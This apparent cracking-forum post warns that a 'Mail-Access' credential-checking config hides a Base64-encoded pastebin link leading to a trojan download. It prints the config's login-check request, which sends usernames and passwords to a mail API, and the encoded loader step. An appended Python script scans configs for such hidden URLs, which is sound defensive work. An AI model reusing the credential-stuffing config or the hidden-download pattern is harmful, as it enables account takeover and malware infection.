OP 16 April, 2021 - 10:12 PM
let me explain for the smoll brainers who want to learn:
the config we're talking about is called Mail-Acces 10K cpm
so let me explain:
[SCRIPT]
JUMP #PASSAPI
#PASSAPl
REQUEST GET "https://aj-https.my.com/cgi-bin/auth?model=&simple=1&Login=<USER>&Password=<PASS>"
HEADER "User-Agent: MyCom/12436 CFNetwork/758.2.8 Darwin/15.0.0"
KEYCHECK
KEYCHAIN Failure OR
KEY "Ok=0"
KEYCHAIN Success OR
KEY "Ok=1"
so it starts by making a GET request to a random API, I haven't figured it out,
might actually be a login API idk, doesn't matter
then it will
FUNCTION Base64Decode "aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0VhbjFNOUdM" -> VAR "urli"
BASE64 decode that random string
decoding that string reveals:
https://pastebin.com/raw/Ean-----
at this URL, in that pastebin, there is a
GitHub link:
https://raw.githubusercontent.com/-----------/earth.mp4
it downloads a .MP4 file. this file, according to VT, is
infected with a trojan, so ye I fucked it with VT
but beware of these configs ty I hope I did a decent job of explanation
they hard code the config as BASE64 so you can't really
see what's happening if you come across this config
just upload it to VT it will fuck it up most likely
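
Added example, not part of the original post: a Python scanner that finds `FUNCTION Base64Decode` literals in a config before it is loaded, decodes them, and reports any that turn out to be URLs, in defanged form. The sample config, its `example.invalid` hosts and the function names are constructed for illustration.

```python
import base64
import binascii
import re

# Matches script lines of the form: FUNCTION Base64Decode "<literal>" -> VAR "<name>"
B64_CALL = re.compile(r'FUNCTION\s+Base64Decode\s+"([A-Za-z0-9+/=]+)"(?:\s*->\s*VAR\s+"([^"]*)")?')
URL = re.compile(r"^[a-z][a-z0-9+.-]*://\S+$", re.IGNORECASE)

# Constructed sample config (hypothetical hosts); the hidden URL is encoded here, not taken from the post.
_hidden = base64.b64encode(b"https://example.invalid/raw/SAMPLE").decode()
SAMPLE_CONFIG = f'''[SCRIPT]
REQUEST GET "https://login.example.invalid/auth?Login=<USER>&Password=<PASS>"
KEYCHECK
FUNCTION Base64Decode "{_hidden}" -> VAR "urli"
FUNCTION Base64Decode "bm90IGEgdXJs" -> VAR "note"
'''


def decode_literal(literal):
    """Return the decoded text, or None if the literal is not valid Base64 holding UTF-8."""
    padded = literal + "=" * (-len(literal) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def defang(url):
    """Make a URL non-clickable for reports and tickets."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def scan_config(text):
    """Return one finding per Base64Decode literal that decodes to a URL."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in B64_CALL.finditer(line):
            decoded = (decode_literal(match.group(1)) or "").strip()
            if URL.match(decoded):
                findings.append({"line": lineno, "var": match.group(2), "url": decoded})
    return findings


if __name__ == "__main__":
    for f in scan_config(SAMPLE_CONFIG):
        print(f'line {f["line"]}: VAR "{f["var"]}" hides {defang(f["url"])}')
```

A literal that decodes to plain text (the second `FUNCTION` line in the sample) is not reported; only decoded values that parse as a URL are.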